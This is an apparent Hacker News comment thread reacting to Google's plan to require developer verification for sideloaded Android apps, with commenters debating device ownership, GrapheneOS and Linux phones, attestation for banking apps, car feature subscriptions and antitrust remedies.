Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
There are many third-party money apps that login to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
At this point, I would stop using commercial cell carriers and ISP-provided equipment altogether, even if that means setting up mesh networks with an underground community. User control or bust.
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
Pretty sure Bunnie named it “precursor” because the plan is to make the actual phone (with a cellular modem) next. If I had the cash to support him and buy a Precursor I would.
Android is decades ahead of that in security, functionality, utility, devex, and design. It's a fools errand to try and modernize that, over building on top of AOSP.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryprographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
TL;DR
If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
Every day we stray farther from the premise that we should be allowed to install / modify software on the computers we own.
Will once again re-up the concept of a “right to root access”, to prevent big corps from pulling this bs over and over again: https://medhir.com/blog/right-to-root-access
To be fair to Google, they got so much cricticism for allowing so many spam apps.
There is no chance that we own our computers unless we figure out how to setup chip manufacturing factories at the 10 million dollar price point.
Without commoditized hardware, big capital will surely be in control of software.
I think there is also still room to legally require a common SW-layer with respective documentation to utilize features of underlying hardware (optional without the shipped OS on top, disconnecting the device from the shipped ecosystem).
This would also make sense in order to prevent e-waste and put this old hardware to better use.
It's crazy to think how much computing power is just added to a drawer or landfill every day, just because there is no reason for the vendor to allow you to repurpose it.
I would e.g. LOVE a "Browser on everything" OS which just provides a Browser OS for outdated hardware, but the only way this could work on scale would be if the device-vendor would be mandated to provide and document the lower layer...
We live in a world where the top chip makers are being shaken down by the US government to keep access to markets because embargoes and tariffs. And where software developers have to have a live feed of what every user is doing to Brussels or be arrested.
Too much capitalism isn't our problem.
Sounds like if US citizens hope for that, we can get it.
The question really isn't whether we should be able to modify computers we own, its whether we own them at all.
The question of how private property, intellectual property and posession/ownership should work is indeed something humanity hasn't properly figured out yet.
But if anything, regular people should have more of the cake.
We have! The only problem is a very limited amount of legal decisions accidentally paved the way for a massive dystopia. In particular, the first sale doctrine [1] solves everything immediately.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
[1] - https://en.wikipedia.org/wiki/First-sale_doctrine
You might be right. We're seeing a paradox of more and more exclusive ownership of property for commercial interests (land, water, airwaves, orbits) and fewer and fewer exclusive ownership for individuals (rented homes, licensed software, subscriptions etc). I too think we're still in a transition stage and humanity has yet to figure this thing out.
Throwing your hat in the political ring?
regardless of what the corporations say we do own the devices we purchase.
Not always. There have been car manufacturers that sold vehicles with features only enabled by a subscription. You may buy a car with heated seats, but the heated seats only work if the manufacturer enables them.
And there should be no law against enabling the heated seats in the car you own without interacting with the manufacturer.
The heated seat is an edge case, but there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car (e.g. replace the breaks with some home-grown solution), as it can put yourself and others in danger, and I see no evil in that being enforced by the government. A more IT-related example might be what radio frequencies can we use - if anyone could spam the whole spectrum, we would lose more than from the "freedom" of being able to do that.
So it's actually far from trivial to draw a line.
> there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car
In at least two european countries that I know of (but probably in all of them) cars need to pass periodic technical inspection to be allowed on the road. Breaks are tested, among other things.
Technical inspections are mandatory across the board in all of the European Union, although the rules (such as the interval between inspections), may differ between countries. The minimum is every two years, some countries do yearly. This is actually governed by a European mandate.
Too bad there is one.
https://en.wikipedia.org/wiki/Digital_Millennium_Copyright_A...
Laws can be interpreted in such a way that invites robber barons to pound sand, or repealed.
Considering the same law is used to strike a 3 hour GPU documentary over a ~30 second clip, I think it serves to corporate pretty well.
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a blog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
[0]: https://www.youtube.com/watch?v=tUnRWh4xOCY
Am I the only one that found that to be a reasonable edge case?
The seat heating was apparently shortening the life of the leather seats. Its cheaper to include heated seats in all cars, than it is to maintain 2 different sets of production. The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled.
Likewise, if you manually enabled the seat heaters, then complained that the seats were falling apart quickly, having given you a legal out to get that feature enabled in warranty, would not have to replace your seats for free.
Not to mention, they apparently already ditched the subscription over backlash.
> The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled
I never heard of car-manufacturers periodically replacing seats within warranty because of the wear of the material, regardless of being "more frequently" or not. This sounds like a massive oversight in product-design.
Of all the cases I know, the customer had to bear the cost of such "wear and tear" cases.
How about automated high/low beam switching or enabling the nominal power of your car instead of handicapping it by default?
If you agree that above are edge cases too, I have a Volkswagen to sell you [0].
[0]: https://www.youtube.com/watch?v=dQNeIcQXy74
>How about automated high/low beam switching
I would want the ability to change that. I actually think I can mess with that on my car.
>enabling the nominal power of your car instead of handicapping it by default?
Big topic for me. My car has a DPF, and appears to have been geared such that despite containing an automatic DPF burn process, the engine never quite reaches the required temperature, so I need to perform manual burns.
I have straight up asked the dealer for a method to enable the auto burn process, manually. And have asked if theres a retune available, to make the gearing just a little bit less efficient, giving me more power and more engine heat.
The issue, pretty much verbatim from their head regional diesel mechanic is that any modifications of that nature would fuck the emissions standards they had to limbo under. So its categorically denied. They also issued me with stern official warnings that anything I do to make the car more reliable may also void my warranty. And the unofficial advice I have received is that the DPF is "f*cked mate" and to "get the petrol hybrid before the government forces it to wear a similar PPF"
The car also very suspiciously moderates the engine output unrelated to gearing/tune. Just sometimes underperforms at random. I believe its computational again, like you say, handicapping it for emissions reasons.
These things are largely optional for me, but I wont mess with them too much until I am out of warranty.
> I would want the ability to change that. I actually think I can mess with that on my car.
Yes, generally you can disable on demand, but Volkswagen now sells the feature as a subscription. So you need to pay to enable. Maybe this is because it reduces the lifespan of the LEDs. Who knows.
> handicapping it for emissions reasons.
Volkswagen sells you another subscription for that now, at least for their electric vehicles. You can buy the option if you want your EV to perform as it's designed.
Emissions is a completely different beast. However their 140HP and 170HP TFSI engines had no different parts rather than the mapping.
Manipulating engines in a way which alters their carbon footprint is a sensitive topic, and while I was positive towards diesel systems, the particulate matter they emit, the fog they cause (see Paris photos, it's eye opening) and German engineering at its finest (i.e. Dieselgate scandal) soured me from diesel's automotive applications, big time, permanently.
This is the same argument people make between Apple and Android.
Can I use an Android phone without using Google? Yes, of course you can. There are plenty of secure OS's like Graphen, Lineage, Calyx and many others. Do people really care enough to use them? Hardly any, which proves my point.
Same thing here. Most people will just pay the fee to get the seats. Some might just opt out and not get them. Others will shop around and find some legacy cars that are older that have them but don't require a subscription.
At the end of the day? There's ALWAYS a choice. How hard do you want to look to avoid the subscription? Is it really worth your time and effort? Some would say yes, the vast majority really DGAF. People have been lulled into not caring about stuff like personal privacy and having a say in what's being peddled to you.
This is a ridiculous take.
The contention point will be whether you purchased the device or not.
In the meantime, corporate is thinking about locking browsers down. Remember this? https://chromestatus.com/feature/5796524191121408
They’ll try again, with big business and governments cheering on them.
Root access on your phone isn't enough: there's layers below root.
I accidentally read this as "there's lawyers below root" and I'm not sure I'm wrong.
It's lawyers all the way down :)
No matter what runlevel you’re on, judges are lower still.
https://en.wikipedia.org/wiki/Runlevel
I see no other way than regulation to force the two to provide drivers and manuals for alternative OS makers.
We should've nipped it with Apple, but there was so much _whatabout_ing that the conversation always go sidetracked with assertions about the free market and what not. It turns out, there is no free market, and we're just living in someone's managed device walled garden.
You can't steal something if you can't own it.
It's amazing how often we hamper the majority of society by protecting the bottom quintile from the consequences of their own mistakes.
The "bottom quintile"? By what metric?
That's not what it's ever actually about. You're buying a disingenuous framing that pins blame on the bottom when all these harmful trends come from the top. This isn't to protect grandma, it's to protect Google. This is always what happens when you allow pockets of power with interests misaligned from those of most people. The pockets of power get their way, and people are worse off.
The thing is, even if Google has a hidden motive in this case, the prevailing public morality doesn't allow you to argue against a measure designed to protect the weakest and poorest among us. Once a vulnerable group has been invoked, the public stops caring about their rights, the cost-benefit balance and most other rational concerns.
I think the phenomenon is most visible in the United Kingdom. Not just with respect to the recent age verification measures, but also with respect to the government's recent financial misadventures.
> You're buying a disingenuous framing
Of course it's a disingenuous framing. A certain kind of person is both attracted to power and deathly afraid of people voicing unapproved opinions "outside their kitchens".
Things can have multiple justifications, some public, some not: some conscious, some not. Central control and a feeling that a parental figure is in control of the tribe primes, at a primal level, a certain kind of person to like an idea. The specific post-hoc justification is almost incidental.
That said, such things need a semblance of legitimacy to work. It'd be much harder to crack down on general purpose computing under the guise of safety if we had cultural antibodies agains safetyism in general.
Everyone makes mistakes
Protecting the bottom quintile from consequences of thier mistakes also protects everyone else if they ever make those mistakes in a momentary lapse
Maybe society shouldn't be structured in such a way that people have to be constantly hyper vigilant to avoid mistakes with high consequences
It's just not possible to prevent mistakes while letting people color outside the lines. Most brilliant ideas look like stupidity at first. I want to live in a world that biases towards discovery over safety.
There is a line, at least a blurry one, though.
There is not much to discover from e.g. not using seatbelts. There is absolutely a need to protect a population from itself which should cover certain stuff, while not others.
> There is absolutely a need to protect a population from itself which should cover certain stuff
No, there isn't. I'd much rather live in a world where we were able to make our own decisions about personal safety, regardless of how poor those decisions are.
There's a direct line from mandating seatbelts to mandating developer certificates. If you accept in one domain that it's legitimate for power to reduce freedom to protect people from themselves, you'll accept it in every domain.
Look: in order for a mandate to be justifiable, it needs to at least provide superlinear benefit to linear adoption. That is, it has to solve a coordination problem.
Do seat belts solve any coordination problem? Do they benefit anyone but those wearing them? No. Therefore, the state has no business mandating them no matter the harm prevented.
A certain kind of person thinks differently though. He sees "harm" and relishes the prospect of "protecting" people from that "harm". They don't recognize the legitimacy of individual bad decisions. The self is just another person trying to hurt you. This kind of person would turn the whole world into a rubberized playground if he could.
You don't necessarily need to prevent all the mistakes, you can often just make them less costly.
s/the bottom quintile from the consequences of their own mistakes/the top centile from antitrust law/g
Sure. You will have the right to root, unless on a device with a locked bootloader. /s
Lets just call it what it is and what we all want. "The right to modify". It doesn't give you the right to copy, so it will never break any law protecting intellectual property.
> Every day we stray farther from the premise that we should be allowed to install / modify software on the computers we own.
I’ve never agreed with this premise.
I buy things that mostly meet my needs and desires in every other walk of life. I’m personally OK with extending this to computers as well.
That doesn't make sense. How do meet your own needs and desires if you can't use your own property the way you want?
And isn't the point in this very situation that people simply can't buy what they want because Google and Apple are a duopoly and now Google is going to follow the path of restricting what you can do with your own property?
If I were in the 0.01%, savings wouldn't be a thing. I wouldn't even need a home. Just go around staying wherever I like for as long as I like doing whatever I want. I wouldn't really care about what google or apple does with their devices, who attacked or defeated whom and all that bs because I wouldn't be in survival mode.
At least this is probably how people in charge of enshittification think like.
This is based on the false assumption that the free market solves every problem.
But the reality (which was correctly identified by Adam Smith himself) is that the effort required to enter a market can sometimes be so high, that we practically end up with oligopolies, see mobile OSs. They require a network effect to make sense, so the entry cost is not just developing the product, but also to somehow convince basically every other player to consider you a target platform - which is a cyclical problem that you can't just bootstrap yourself into. Even Microsoft failed at it, even though they were paying hefty sums to companies for apps working on their OS.
My needs and desires are to have control over my tech stack.
Ok I'll bite. Tell me what you find appealing about losing authority? Is this some kind of emotional response for not wanting to take responsibility?
Are you intentionally defending a rent-economy or just ignorantly?
If this is a thing then the solution they offer is incorrect. A big giant red screen: “warning the identity of this application developer has not been verified and this could be an application stealing your data, etc” would have worked.
What they want is to get rid of apps like YouTube Vanced that are making them lose money (and other Play Store apps)
It felt weird that the official press release was quoting entities from these countries, as if it should give confidence to the rest of the world. I can't imagine what these countries would want with apps that can be traced back to a government id...
Vanced and such is more of a First World/Western issue. I don't think you're wrong but I got a strong gut feeling there's other pressures in the works. Just something doesn't smell right...
"Displaying an angry warning message" is one of the tools we've used for decades, and never with much success.
In addition to the other perspectives already offered here, warning screens such as the one you propose were already shown for sideloaded apps, and these screens worked against Google in their lawsuit with Epic Games. So that's another contributing factor for the policy we're discussing.
It won't work because of too many false positives. People are already trained to ignore warnings, like how they blindly accept T&C without reading.
If a giant red warning saying 'THIS APP MAY BE MALWARE' doesn't stop someone, then they've either made an informed choice to proceed or it's willful negligence. In other words, users aren't 'trained' to ignore warnings; they're simply being willfully negligent.
This is something laughable that Apple does. Anytime you install something from Github it'll make you click a few extra boxes. And their tightening down of things also ends up making people look for third party software in the first place. All this really does is, like you said, teach people to ignore warnings.
Is it possible to install stuff from GitHub on iOS? I thought it was completely impossible on apple devices.
I was referring to OSX but if you didn't know there's a current European lawsuit going on about doing exactly this for iOS
It is, but you have to reinstall it every week.
> It is, but you have to reinstall it every week.
I'd greatly appreciate it if you can share the relevant link/repo for it?
Then make the false positives lower. The problem is they aren't incentivized to improve such features because, where's the money in that?
The way we allow paternalistic tech companies to train the consumer to abdicate personal responsibility is going to bite us in the ass sooner or later. I'm betting on sooner.
It's such a simple and effective solution that could be implemented overnight and 'help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users personal data' tomorrow. Mission accomplished, internet saved, and everyone's happy just like a fairy tale out of the early 2000s.
I've often lamented at work that we lose freedom at the guise of "security".
Security and Intellectual Property (IP) protection could both be true. Google has a big enough reason to make it happen now.
In a perverse way it's not that protecting Google's IP is making us safer. Yet it, strangely is.
Do you like losing money?
> Do you like losing money?
what about us losing control over our own devices? do you like losing control over devices you paid for?
People have no "control" over their own device if they have malware on it. The weirdo incoherent tech-chauvinism of "control" and "freedom" evidenced all over this thread is one of the most obnoxious trends on HN.
Would you give your car keys to a company, in fear that a thief might steal it?
Of course i care that i lose money.
I dont care that google loses money.
Yet you expect them to act in a way that would make them lose money?
That was never the real reason. Security and "think of the children" to take away rights are the two oldest plays in the playbook.
The funny thing is Stallman started his fight like half a century ago and on regular days Hacker News shits on him eating something off of his foot and not being polished and diplomatic, and loves practical aspects of Corporate Open Source and gratis goodies and doesn't particularly care about Free Software.
On this day suddenly folks come out of the woodwork advocating for half baked measures to achieve what Stallman portrayed but they still hardly recognize this was EXACTLY his concern when he started the Free Software movement.
It's possible to believe both that Stallman is over the top and that stuff like this Google action is bad, and even to be right on both. It's even easier to believe that Stallman has had some good ideas but is still a deeply flawed human being, and has also incidentally not been the most effective advocate for his own ideals.
It is possible, sure, but I have a feeling it goes unrecognized how prophetic and precise his concerns were, and that this is very similar to his original issue with the closed-source printer software he was not allowed to fix, and he does not get credit for his predictions, as people simply pass by, and not connect it to the Free Software issue, when issues like this happen; meanwhile he takes all the downsides of being brash and anti-corporate, which is taken advantage of by the Corporate Open Source crowd.
Who is doing a better job?
Because I see A LOT of “open source” advocates these days, and more and more “source available”.
But the old school Free Software hippies(that started with BSD, NOT GNU, IMNHO) are slowly dying out and being replaced with?
I shit on Stallman because he fights quite vocally against singular they and neopronouns, and invents his own replacement for it. A cause no one needs his opinions on and a solution no one in the community wants.
It just seems needlessly pedantic and irritating to go to a minority group and say, "you minority group are doing your culture wrong". It, perhaps much more problematically, encourages others to feel like they should drive by trans and non binary communities and tell those communities about how they are doing language wrong.
He also said he was "skeptical that voluntary pedophilia harms children." There's a lot to unpack there, but that's a pretty deeply fucked yup thing to say.
The foot stuff is a quirk. Kind of an icky quirk, but whatever. Those other critiques are very reasonable reasons to be uncomfortable lionizing rms.
I think his proposal to use "per" instead of "they" actually makes a lot of sense, because "they" is very confusing in a lot of contexts, because it's a word already used for another function. I don't see how you perceive that as something negative.
The quote about pedophilia is concerning indeed, but I think that rather stems from ignorance about the issues than promoting pedophelia. It's easy to shit on such things and wokely dismiss someone's entire opinion, which I find a bit weak.
The guy quite obviously is diversely talented. A computer genius, but well below generally agreed upon levels of mental deficiency in areas that most people care about.
This is really bad. I think that most people on HN will agree with that.
The problem is that most normal people (HN is not normal - mostly for the better) don't even understand what sideloading is - let alone actually care.
How can we fix this?
(aside from making people care - apathy enables so many political problems in the current age, but it's such a huge problem that this definitely isn't going to be the impetus to fix it)
This certainly won't solve the problem, but I would at least like to banish the term "side load", which is a kind of Orwellian word that takes something everyone used to do all the time and makes it sound obscure and a bit nefarious. Maybe we, the tech literate, can start calling sideloading a "free install" or something. When asked, we can clarify that the 'free' stands for both freedom, and not paying middlemen 30%.
This is a great point. Not sure if it’s possible, would be great if there was some way to reclaim the notion of installing software as a general practice, regardless of whether a computer is “mobile” or “desktop”.
Like people still download software packages from the web on Windows, MacOS, and Linux… right? Maybe hard to grasp for the kids that grew up with tablets with no notion of a file system, idk
I propose "load" or "install".
And while we are at it, "Application"
I call it "direct install" personally. It's how you are supposed to be able to install programs, directly from the source.
If anything, it's the playstore and appstore which are side channels.
This is a good term, as it avoids the libre/gratis confusion as well.
People install games from Steam or the Epic Store on their computers without Microsoft preventing that or taking a cut all the time (not for lack of trying. I know). But somehow, in the mobile world, we went with total lockdowns and platform extortion as the rule?
The irony of that iconic Apple 1984 add .
> People install games from Steam or the Epic Store on their computers without Microsoft preventing that
microsoft wishes they could have the level of platform control that google/apple on mobiles have.
It's pure luck that the IBM-compatible PC was not locked down and restricted, because at the time IBM had not thought of it as being important. When it became clear that it was a lost profit opportunity, the cat was already out of the bag and so IBM had no choice.
Microsoft repeated the same "mistake". But apple learnt, and google also from apple.
I agree that this is a horrible step in the wrong direction but in terms of the solution I have a different take.
I don't think that making "normal" people "care" about sideloading is the answer, because a) it's impossible and b) political change doesn't happen through "normal" people anyway, all political and regulatory change is driven via smaller and motivated groups of people.
The problem is fundamentally that there's a duopoly on mobile OSes that has tons of market power and if they want to dictate a change like "you can no longer install unapproved software," they can just do it.
The solution is to walk away from that duopoly, to suck it up and just stop using their products. We fortunately are able to do this (for now) on desktop and running Linux in 2025 is better than it's ever been, and more people are doing it.
To get Linux or some alternative on phones is a big task, and if you make the switch you're going to lose a lot. But most of what has no desktop equivalent is addictive social media garbage that you should get rid of anyway. The biggest thing I'm concerned about is the state of banking and OTP/2FA.
I think we need to fight for universal electronic access to the financial system as a right without a need for gatekeepers like Apple or Google. In some countries it's already the case that at many businesses you must use your phone to make payments, cash is gone, cards are dying, and you must therefore agree to Apple or Google's rules to use your phone. This is truly how freedom and democracy will die if we allow it. This is way bigger for "normal" people than technical concepts like sideloading. People on the left should inherently understand the importance to liberty of having the right as an individual to buy and sell without some megacorp's permission. For people on the right, well, remember the Bible's "Mark of the beast..."
Secondarily we need to fight for the enforcement of anti-trust laws, which half of HN doesn't seem to even know exist, or feels are in some way unfair, even though they are the cause of these problems. Government needs to reach in and rearrange markets that are dominated by one or two players, it needs to forcefully restructure those companies so that they lose their market power and can no longer force citizens to obey their will. We've done it before, such as ending company towns where you were forced to use the company's scrip at the company's shop to buy living essentials. It's worked, we need to do it again.
I can do banking and otp at home with a 100 Euro phone that I use only for that. FB, TikTok, Instagram, etc, neve ever installed them on my devices.
The problem is that I want to make calls, SMSes, use WhatsApp and Telegram, Maps and OSMAnd, NewPipe, VLC, Syncthing and a few others on the phone I carry with me.
And to make matters worse I don't want a huge, thick and heavy brick like every Linux phone I read about. I'm on a Samsung A40 now and it's not easy to find a replacement with similar size and weight.
How are you going to buy things when you leave home?
In the country I live in, which is a highly online and highly mobile first country, a sizeable minority of businesses no longer accept cash. A few no longer even accept cards.
At these businesses, there is only one way to pay, which is to pull out your phone, and initiate a transaction through your mobile banking app, you scan a QR from the vendor and approve the transfer.
Mobile banking is so ubiquitous that often these businesses don't even have signage outlining their payment policies, or it's tiny and hard to find.
Some banks do not have an online banking website, the only way to access your money and make a payment is to use the Android or iOS app on an unrooted device, or physically go to a branch or ATM.
You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
It's prevalent enough that being outside of your home without an unrooted Google or Apple operating system physically on your person is a significant impediment to buying basic things, like a meal.
Apple and Google will, through a variety of technical changes, seek to make this the case in all of the world, and in some countries they'll succeed. So the important question now is: how will it go down in the next 10 years in your country? How far under their control is your society going to fall?
Banking, money and payments. Limiting those in the name of security is how they will get you on everything else.
They will take away cash and cards and there will only be payment apps, on approved secure OSes which you can't "tamper" with (aka install "unauthorized" software like VLC or a Youtube alternative on), or else the payments apps stop working.
They will take away SMS OTP and there will only be TOTP, because it's more secure. Then they will replace the OTP with a facial scan, because it's more secure, people were being social engineered into giving someone those numbers over the phone, etc.
This is all in process. They don't even hide it, they just say it's for security. It is already happening in countries that are highly online and highly phone-centric.
> You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
Note that this is likely illegal, even though I'm sure it's very common in certain places, and arguing about legal tender laws is not how you want to spend every meal of course.
But, in principle, in most countries at least, businesses and private citizens are obligated to accept the country's currency to discharge debts. They're free to have an upfront no cash policy, and refuse to do business with you if you try to pay with cash, for example making you leave all your groceries at the checkout counter. But if they claim that you have a debt to them, such as a meal you've already eaten and now must pay for, they must accept any form of the country's currency, such as cash, as a means of you paying that debt off.
> I can do banking and otp at home with a 100 Euro phone that I use only for that.
That doesn't solve anything, though. If Google revoked your Google account and refused to open a new one, you'd be SOL - you'd either have to buy an iPhone, or move banks until you find one that gives you a physical TOTP (since many just have apps already, but those apps don't run unless downloaded from the Google or Apple stores).
Telegram's clients are open-source, and there's plenty of non-official ones, but for other proprietary messengers you're SOL.
Hard to believe at this point that these messengers used to use open standard protocols, and you could send messages from Google Talk to Facebook once.
> I don't want a huge, thick and heavy brick like every Linux phone I read about
While I understand your point, are you even going to notice after a couple of weeks of daily driving? Let’s not underestimate our ability to get used to things.
We need another os in the market. A duopoly just isn't competitive enough. Too bad the cost of entry is so high.
Valve has managed something similar with SteamOS as well as Proton built on Wine to make Windows games run on Linux, performing as good as or often better than an actual (modern) Windows install.
SteamOS isn’t too far from a mobile OS.
It's the mobile hardware drivers (such as for the modems and 5g etc) that likely roadblocks - these hardware manufacturers probably have some sort of OEM agreements, and so cannot opensource these drivers for all devices.
I would wish that mobile devices' specs and hardware drivers are all available, so that i am not dependent on the manufacturer supplying a compatible OS.
I agree with you idealistically, but practically, creating an entirely new mobile OS with market share competitive with the existing two is an unbelievably massive challenge. It'd probably be just about as easy to get people to care about sideloading in the first place.
Remember how Android used to be an open source project and how we had Google backing AOSP? I think it's time we we maintain the latest fork and just use that instead.
That only solves the OS side of things, but doesn't give you a good ecosystem. Unfortunately and increasingly bigger number of apps rely on Google services and attestations, meaning you need a Google approved software to run them.
Is AOSP no longer a thing? I've been using GrapheneOS for a few years and admittedly lost track of AOSP, I just assumed it was still a thing despite Google generally wanting to control more and more.
Google now only drop through source code after a release, not during development. Also, much AOSP functionality has been moved to Googles Play Services which is closed source.
That's not the problem. It's the bootloader locked hardware and the TPM anti-"tampering" security verification that more and more apps require.
It's not just the OS makers. They're also responding to the demand of companies and governments to control their users through them. They will not say "no".
The problem is moves like this will keep happening, since people don’t have much choice. Unless we bring up a societal trend of dumb phones.
We used to have strong consumer protection advocates on both sides of the Atlantic, and those consumer protection advocates used to influence laws and regulation which forced corporations to stop doing anti-consumer stuff like this. Those days can return with enough organized labor and solidarity among the working classes.
I had to do some light research on Wiki, but it looks like Firefox OS was supposed to fill part of this void. Sadly, it was not successful, and the project lost funding and support from Mozilla. I think if Mozilla could not do it, it seems hard to imagine there is an open source org with more talent and money than Mozilla who can make it work.
It's not necessarily that Mozilla could not do it. Just look up Mozilla's revenue sources.
Sailfish tried and failed. Various Linux distro also tried and failed even harder. Consumers at large just aren't interested in anything other than iOS and Android.
Consumers are interested in everything new.
The problem is - linux (outside on server land and maybe SteamOS) is everything but (regular) user friendly.
When people buy a new phone the expect a smooth experience without any major inconveniences and uniform UI. And apps. Lots of apps. Full of features and mature UI. Linux mostly have none of it.
Users need a new feature or a new power to justify transition. Learning of new OS is not free. Someone should reuse Android UI, but upgrade the OS to full Linux.
It’s like uber, doordash or carvana, you can’t fund a huge project like this without free money. ZIRP is the moat.
There's already open source OSes that run on phones that aren't based on Android.
Off the top of my head there's a Debian based one, a Fedora based one, webOS, PostmarketOS, probably others. Wouldn't be that difficult but yeah, the cost of entry is still probably tens of millions.
use a fork. GrapheneOS is amazing. I feel like I own my phone, I trust my phone, and it obeys me, for the first time in a decade.
unlock. flash. spread the word. use the fork, Luke.
This is also no long term solution. GrapheneOS can't diverge from Google android to much, otherwise modern apps stop working. And Google will definitely go for alternative roms next.
They don't understand sideloading, but you know what they understand?
Weird apps that block your phone and show ads constantly (yes this exists)
Typosquatting apps
Apps that hold your phone for ransom if you don't pay a certain debt (yes this exists) https://www.welivesecurity.com/en/eset-research/beware-preda...
> most normal people... don't even understand what sideloading is
Actually, they understand it just fine. The concept is very simple too.
Before this change you could install Android apps without registering your passport/driving license with Google.
After this change you will have to tell Google your real name and home address to install anything on your Android device. This is all. It can take a convoluted form of registering Google account or a more direct form of sending Google your identity documents to confirm "developer privileges". But you will no longer be able to use non-hacked Android devices to install anything without doing those steps.
P.S. I recall that some people still believe that they can create Google account without giving Google your personal details, phone etc. This is simply a self-delusion. If Google does not immediately demand you to cough up a phone numbers under pretense of "suspicious activity", that's because they already know who you are (you probably told them yourself by registering another account elsewhere).
No, "burner SIM cards" aren't real. This is just another form of self-delusion, — this time architected by US security agencies. You don't become anonymous by using those, you become watched.
